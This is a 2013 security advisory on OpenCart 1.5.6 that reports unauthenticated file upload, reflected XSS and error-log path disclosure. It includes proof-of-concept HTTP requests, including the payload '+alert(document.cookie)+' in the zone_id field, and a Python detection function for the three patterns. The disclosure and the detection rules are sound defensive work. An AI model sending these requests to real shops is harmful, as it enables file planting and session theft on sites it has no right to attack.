Dec 09, 2013

Opencart Multiple Vulnerabilities

vulners.com

###########################################################################

Title: Opencart Multiple Vulnerabilities

Vendor: http://www.opencart.com

Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure

Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)

Exploitation: Remote with browser

Impact: High

Vendor Supplied Patch: N/A

Original Advisory with Workaround:

http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html

###########################################################################

####################
Description:
####################

Quote from vendor: OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and you're ready to start accepting orders.

####################
Vulnerability:
####################

In the process of optimizing the crawler engine of garda.ir (garda.ir is a Persian online shopping price comparison service that uses new search engine technologies to collect prices), we found a file upload vulnerability in the OpenCart application; further investigation led us to discover other vulnerabilities, such as path disclosure and XSS.

####################
POC:
####################

1. File Upload

Insufficient Authorization in /catalog/controller/product/product.php

Result: testupload.txt.somehash is created in the /download folder

POST /opencart-1.5.6/index.php?route=product/product/upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 206
Connection: Keep-Alive

-----------------------------4827543632391
Content-Disposition: form-data; name="file"; filename="testupload.txt"
Content-Type: text/plain

testtesttest
-----------------------------4827543632391--

2. Reflected XSS and Path Disclosure

Input Validation Error in /catalog/controller/account/register.php

Result: this causes arbitrary script code to be executed by the target user's browser.

POST /opencart-1.5.6/index.php?route=account/register HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------1e7a98bc645efbe7
Content-Length: 181
Host: example.com
Connection: Keep-Alive

-----------------------------1e7a98bc645efbe7
Content-Disposition: form-data; name="zone_id"

12345'+alert(document.cookie)+'
-----------------------------1e7a98bc645efbe7--

3. Information Leakage - Path Disclosure

Insufficient Authorization in /system/logs/error.txt

Result: Information Disclosure

http://www.example.com/opencart-1.5.6/system/logs/error.txt
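The three request patterns above can be turned into detection rules for a reverse proxy or WAF hook. The following is an added example written for this advisory, not code from the advisory or from OpenCart; it assumes the caller supplies the request method, URL, parsed form fields and an `authenticated` flag (for example derived from a valid customer session), and every sample request in the test is constructed from the PoCs.

```python
"""Detection rules for the OpenCart 1.5.6 issues described in this advisory.

Added example, not part of the advisory or of OpenCart. Models one request the
way a WAF or proxy hook would see it and returns tags for what was matched.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Route that accepts uploads without requiring a logged-in customer (issue 1).
UPLOAD_ROUTE = "product/product/upload"
# Route whose zone_id field is reflected without validation (issue 2).
REGISTER_ROUTE = "account/register"
# The error log is served as a static file below the web root (issue 3).
LOG_PATH_RE = re.compile(r"/system/logs/[^/]+\.txt$")
# Cheap indicator of script injection in a field that should be an integer.
SCRIPT_RE = re.compile(r"""['"<>]|\balert\s*\(|javascript:|document\.""", re.I)


def classify_request(method, url, form=None, authenticated=False):
    """Return a list of finding tags for one request (empty list = clean).

    `authenticated` is an assumption of this example: the caller decides it,
    e.g. from a valid OpenCart customer session.
    """
    form = form or {}
    parts = urlsplit(url)
    route = parse_qs(parts.query).get("route", [""])[0]
    findings = []

    # Issue 1: file upload reachable without authorization.
    if method == "POST" and route == UPLOAD_ROUTE and not authenticated:
        findings.append("unauthenticated-upload")

    # Issue 2: zone_id must be numeric; anything else is reflected unescaped.
    if route == REGISTER_ROUTE:
        zone = form.get("zone_id", "")
        if zone and not zone.isdigit():
            findings.append("register-zone_id-nonnumeric")
            if SCRIPT_RE.search(zone):
                findings.append("register-zone_id-xss")

    # Issue 3: direct read of the error log (path disclosure).
    if method == "GET" and LOG_PATH_RE.search(parts.path):
        findings.append("error-log-access")

    return findings
```

A production deployment would block or alert on any non-empty result and, for issue 3, deny the `/system/logs/` prefix at the web server as well.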

####################
Solution:
####################

There is no vendor supplied patch at the time of this entry.
For a workaround, check the Original Advisory.

####################
Credit:
####################

Discovered by: trueend5 (trueend5 [at] yahoo com)

This advisory is sponsored by garda.ir
http://www.garda.ir
A Persian online shopping price comparison service